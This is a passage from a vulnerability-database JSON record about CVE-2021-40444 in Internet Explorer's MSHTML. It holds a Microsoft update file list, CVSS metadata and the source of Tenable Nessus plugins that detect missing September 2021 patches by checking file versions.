9.0.8112.21591| 9-Sep-2021| 3:15| 173,056 \njsdbgui.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 499,200 \niertutil.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 2,163,200 \nsqmapi.dll| 6.0.6000.16386| 9-Sep-2021| 3:31| 176,024 \nVGX.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 997,376 \nurl.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 237,056 \nieframe.dll| 
9.0.8112.21591| 9-Sep-2021| 3:17| 10,944,000 \nieui.dll| 9.0.8112.21591| 9-Sep-2021| 3:12| 248,320 \nieinstal.exe| 9.0.8112.21591| 9-Sep-2021| 3:15| 490,496 \nInetRes.adml| Not versioned| 9-Sep-2021| 3:37| 393,813 \ninetres.admx| Not versioned| 11-Mar-2021| 0:10| 1,601,204 \njsdebuggeride.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 141,312 \njscript.dll| 5.8.7601.21586| 9-Sep-2021| 3:15| 818,176 \njscript9.dll| 9.0.8112.21591| 9-Sep-2021| 3:21| 2,358,784 \nvbscript.dll| 5.8.7601.21586| 9-Sep-2021| 3:15| 583,680 \niexplore.exe| 9.0.8112.21591| 9-Sep-2021| 2:17| 751,512 \nieUnatt.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 142,848 \nurlmon.dll| 9.0.8112.21591| 9-Sep-2021| 2:06| 1,142,784 \ninetcpl.cpl| 9.0.8112.21591| 9-Sep-2021| 2:05| 1,427,968 \nwininet.dll| 9.0.8112.21591| 9-Sep-2021| 2:06| 1,132,544 \njsproxy.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 75,776 \nWininetPlugin.dll| 1.0.0.1| 9-Sep-2021| 2:05| 66,048 \ntdc.ocx| 9.0.8112.21591| 9-Sep-2021| 2:05| 63,488 \niedvtool.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 678,912 \ndxtmsft.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 354,304 \ndxtrans.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 223,744 \nmsfeeds.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 607,744 \nmsfeeds.mof| Not versioned| 9-Sep-2021| 1:40| 1,518 \nmsfeedsbs.mof| Not versioned| 9-Sep-2021| 1:40| 1,574 \nmsfeedsbs.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 41,472 \nmsfeedssync.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 10,752 \nmshta.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 11,776 \nhtml.iec| 2019.0.0.21586| 9-Sep-2021| 2:08| 367,616 \nmshtmled.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 72,704 \nmshtml.dll| 9.0.8112.21591| 9-Sep-2021| 2:10| 12,845,056 \nmshtml.tlb| 9.0.8112.21591| 9-Sep-2021| 2:05| 2,382,848 \nielowutil.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 223,232 \nieproxy.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 195,072 \nIEShims.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 194,560 \nExtExport.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 22,528 \njsdbgui.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 387,584 
\niertutil.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 1,808,384 \nsqmapi.dll| 6.0.6000.16386| 9-Sep-2021| 2:17| 142,744 \nVGX.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 769,024 \nurl.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 231,936 \nieframe.dll| 9.0.8112.21591| 9-Sep-2021| 2:07| 9,757,696 \nieui.dll| 9.0.8112.21591| 9-Sep-2021| 2:03| 176,640 \nieinstal.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 474,624 \njsdebuggeride.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 104,448 \njscript.dll| 5.8.7601.21586| 9-Sep-2021| 2:05| 723,456 \njscript9.dll| 9.0.8112.21591| 9-Sep-2021| 2:11| 1,819,648 \nvbscript.dll| 5.8.7601.21586| 9-Sep-2021| 2:05| 434,176 \n \n## **Information about protection and security**\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n\n## **References**\n\nLearn about the [terminology](<https://support.microsoft.com/help/824684>) that Microsoft uses to describe software updates.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-07T07:00:00", "type": "mskb", "title": "KB5005563: Cumulative security update for Internet Explorer: September 14, 2021", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": 
"AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-07T07:00:00", "id": "KB5005563", "href": "https://support.microsoft.com/en-us/help/5005563", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-11T14:55:54", "description": "The Internet Explorer installation on the remote host is missing a security update. It is, therefore, affected by a memory corruption error in the scripting engine. An unauthenticated, remote attacker can exploit this to execute arbitrary commands. (CVE-2021-40444)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "Security Updates for Internet Explorer (September 2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-08-22T00:00:00", "cpe": ["cpe:/a:microsoft:ie"], "id": "SMB_NT_MS21_SEP_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/153374", 
"sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153374);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/22\");\n\n script_cve_id(\"CVE-2021-40444\");\n script_xref(name:\"MSKB\", value:\"5005563\");\n script_xref(name:\"MSKB\", value:\"5005606\");\n script_xref(name:\"MSKB\", value:\"5005613\");\n script_xref(name:\"MSKB\", value:\"5005623\");\n script_xref(name:\"MSKB\", value:\"5005633\");\n script_xref(name:\"MSFT\", value:\"MS21-5005563\");\n script_xref(name:\"MSFT\", value:\"MS21-5005606\");\n script_xref(name:\"MSFT\", value:\"MS21-5005613\");\n script_xref(name:\"MSFT\", value:\"MS21-5005623\");\n script_xref(name:\"MSFT\", value:\"MS21-5005633\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Security Updates for Internet Explorer (September 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is missing a security update. It is, therefore, affected by a\nmemory corruption error in the scripting engine. An unauthenticated, remote attacker can exploit this to execute\narbitrary commands. 
(CVE-2021-40444)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005563\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005606\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005613\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005623\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005633\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB5005563\n -KB5005606\n -KB5005613\n -KB5005623\n -KB5005633\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-40444\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"false\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = 'MS21-09';\nvar kbs = make_list(\n '5005563',\n '5005606',\n '5005613',\n '5005623',\n '5005633'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nvar os = get_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar productname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif ('Windows 8' >< productname && '8.1' >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif ('Vista' >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:'6.3', sp:0, file:'mshtml.dll', version:'11.0.9600.20120', min_version:'11.0.9600.16000', dir:'\\\\system32', 
bulletin:bulletin, kb:'5005563') ||\n\n # Windows Server 2012\n # Internet Explorer 11\n hotfix_is_vulnerable(os:'6.2', sp:0, file:'mshtml.dll', version:'11.0.9600.20120', min_version:'11.0.9600.16000', dir:'\\\\system32', bulletin:bulletin, kb:'5005563') ||\n\n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:'6.1', sp:1, file:'mshtml.dll', version:'11.0.9600.20120', min_version:'11.0.9600.16000', dir:'\\\\system32', bulletin:bulletin, kb:'5005563') ||\n\n # Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:'6.0', sp:2, file:'mshtml.dll', version:'9.0.8112.21591', min_version:'9.0.8112.16000', dir:'\\\\system32', bulletin:bulletin, kb:'5005563')\n)\n{\n var report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB5005563 : Cumulative Security Update for Internet Explorer\\n';\n\n if(os == '6.3')\n {\n report += ' - KB5005613 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:bulletin, kb:'5005613', report);\n }\n else if(os == '6.2')\n {\n report += ' - KB5005623 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:bulletin, kb:'5005623', report);\n }\n else if(os == '6.1')\n {\n report += ' - KB5005633 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:bulletin, kb:'5005633', report);\n }\n else if(os == '6.0')\n {\n report += ' - KB5005606 : Windows Server 2008 Monthly Rollup\\n';\n hotfix_add_report(bulletin:bulletin, kb:'5005606', report);\n }\n\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n\n var port = kb_smb_transport();\n\n hotfix_security_warning();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:54:45", "description": "This plugin is a work-around and is being deprecated due other 
superseded Microsoft Security patches. See Nessus Plugin IDs: 153374, 153372, 153373, 153375, 153377, 153381, 153383", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft Internet Explorer OOB (Sept 2021) (deprecated)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-05T00:00:00", "cpe": ["cpe:2.3:a:microsoft:ie:*:*:*:*:*:*:*:*"], "id": "SMB_NT_MS21_IE_SEPT_2021.NASL", "href": "https://www.tenable.com/plugins/nessus/153214", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2021/09/23. 
Deprecated due to patch tuesday patches.\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153214);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/07/05\");\n\n script_cve_id(\"CVE-2021-40444\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Security Updates for Microsoft Internet Explorer OOB (Sept 2021) (deprecated)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"This plugin is a work-around and is being deprecated due other superceded Microsoft Security patches. See Nessus \nPlugin IDs: 153374, 153372, 153373, 153375, 153377, 153381, 153383\n \");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444\");\n script_set_attribute(attribute:\"solution\", value:\n\"n/a\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:C/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-40444\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:microsoft:ie\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\nexit(0, 'This plugin has been deprecated. Use Nessus Plugin IDs: 153374, 153372, 153373, 153375, 153377, 153381, 153383 ');\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:54:49", "description": "The remote Windows host is missing security update 5005627 or cumulative update 5005613. It is, therefore, affected by multiple vulnerabilities :\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36960, CVE-2021-36962, CVE-2021-36969, CVE-2021-36972, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958, CVE-2021-40444)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36974, CVE-2021-38628, CVE-2021-38630, CVE-2021-38633, CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. 
(CVE-2021-36961)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-38624)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36959)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005627: Windows 8.1 and Windows Server 2012 R2 September 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26435", "CVE-2021-36955", "CVE-2021-36958", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36969", "CVE-2021-36972", "CVE-2021-36974", "CVE-2021-38624", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38633", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": 
"2022-08-22T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005613.NASL", "href": "https://www.tenable.com/plugins/nessus/153375", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153375);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/22\");\n\n script_cve_id(\n \"CVE-2021-26435\",\n \"CVE-2021-36955\",\n \"CVE-2021-36958\",\n \"CVE-2021-36959\",\n \"CVE-2021-36960\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36969\",\n \"CVE-2021-36972\",\n \"CVE-2021-36974\",\n \"CVE-2021-38624\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38630\",\n \"CVE-2021-38633\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40444\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"MSKB\", value:\"5005613\");\n script_xref(name:\"MSKB\", value:\"5005627\");\n script_xref(name:\"MSFT\", value:\"MS21-5005613\");\n script_xref(name:\"MSFT\", value:\"MS21-5005627\");\n\n script_name(english:\"KB5005627: Windows 8.1 and Windows Server 2012 R2 September 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005627\nor cumulative update 
5005613. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-36960, CVE-2021-36962,\n CVE-2021-36969, CVE-2021-36972, CVE-2021-38629,\n CVE-2021-38635, CVE-2021-38636)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965, \n CVE-2021-36958, CVE-2021-40444)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964,\n CVE-2021-36974, CVE-2021-38628, CVE-2021-38630,\n CVE-2021-38633, CVE-2021-38638, CVE-2021-38639,\n CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-38624)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. 
(CVE-2021-36959)\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005627-security-only-update-3404d598-7d6e-4007-93e8-49438460791f\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c74eba5d\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005613-monthly-rollup-47b217aa-8d33-4b29-b444-77fcbe57410b\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f099b11d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005627 or Cumulative Update KB5005613.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36958\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"false\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-09\";\nkbs = make_list('5005627', '5005613');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif 